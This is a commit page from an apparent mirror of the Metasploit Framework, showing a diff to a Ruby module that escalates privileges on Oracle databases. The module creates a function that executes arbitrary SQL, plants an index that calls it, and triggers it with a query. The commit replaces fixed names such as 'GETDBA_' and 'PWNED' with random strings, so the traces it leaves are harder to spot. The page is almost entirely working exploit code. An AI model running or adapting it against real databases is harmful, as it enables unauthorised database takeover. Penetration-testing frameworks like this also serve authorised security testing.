infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Randomize more

master
Moshe Kaplan 2018-11-22 15:25:51 -05:00 committed by GitHub
parent 9815c6b91d
commit 0a2c0751fa
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 12 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/auxiliary/admin/oracle/oracle_index_privesc.rb
View File

@ -33,11 +33,11 @@ class MetasploitModule < Msf::Auxiliary
end
def run
return if !check_dependencies
return unless check_dependencies
name = Rex::Text.rand_text_alpha(rand(5) + 1)
randomizer = Rex::Text.rand_text_alpha(6..12)
func_name = "#{randomizer}" + Rex::Text.rand_text_alpha(2..6)
func_name = "GETDBA_#{datastore['DBUSER']}_#{name}"
create_function = "
CREATE OR REPLACE FUNCTION #{func_name}
(FOO varchar) return varchar
@ -46,14 +46,15 @@ class MetasploitModule < Msf::Auxiliary
begin
execute immediate '#{datastore['SQL']}';
commit;
return 'PWNED';
return '';
end;
"
index_name = "exploit_index__#{datastore['DBUSER']}_#{name}"
index_name = "#{randomizer}" + Rex::Text.rand_text_alpha(2..6)
param_value = Rex::Text.rand_text_alpha(2..6)
create_index = "
CREATE INDEX #{index_name} ON
#{datastore['TABLE']}(#{datastore['DBUSER']}.GETDBA_#{datastore['DBUSER']}_#{name}('BAR'))"
#{datastore['TABLE']}(#{datastore['DBUSER']}.#{func_name}('#{param_value}'))"
trigger = "SELECT * FROM #{datastore['TABLE']}"
@ -64,14 +65,19 @@ class MetasploitModule < Msf::Auxiliary
begin
print_status("Attempting to create function #{func_name}...")
print_status(create_function)
prepare_exec(create_function)
print_status("Attempting to create index #{index_name}...")
print_status(create_index)
prepare_exec(create_index)
print_status("Querying to trigger function...")
print_status(trigger)
prepare_exec(trigger)
print_status("Cleaning up index...")
print_status(clean_index)
prepare_exec(clean_index)
print_status("Cleaning up function...")
print_status(clean_func)
prepare_exec(clean_func)
print_status("Exploit complete!")
rescue ::OCIError => e